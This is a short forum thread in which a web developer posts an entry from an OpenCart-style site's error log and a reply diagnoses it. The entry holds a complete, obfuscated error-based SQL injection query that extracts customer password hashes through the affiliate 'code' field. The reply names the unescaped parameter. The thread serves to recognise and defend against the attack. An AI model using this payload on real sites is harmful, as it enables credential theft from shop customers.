Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Странные записи в логе ошибок


pashast

Recommended Posts

Взял сайт клиента на доработку, а там куча подобных записей в логе

2017-01-09 7:02:41 - PHP Notice:  Error: Duplicate entry '!~!488f66ad1d22020293!~!1' for key 'group_key'<br />Error No: 1062<br />SELECT affiliate_id FROM `oc_affiliate` WHERE code = 'sk' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,ifnull(password,char(32)),0x217e21) /**/fRoM site.oc_customer /**/lImIt 744,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1' in

Может кто видел такое?

Похоже что кто-то пытался вытащить пароли

 

Надіслати
Поділитися на інших сайтах

Типичный запрос для автоматических средств эксплуатации mysql-i уязвимостей.

 

Дырка в запросе к таблице oc_affiliate.

Не достаточное экранирование для поля - code.

Надіслати
Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.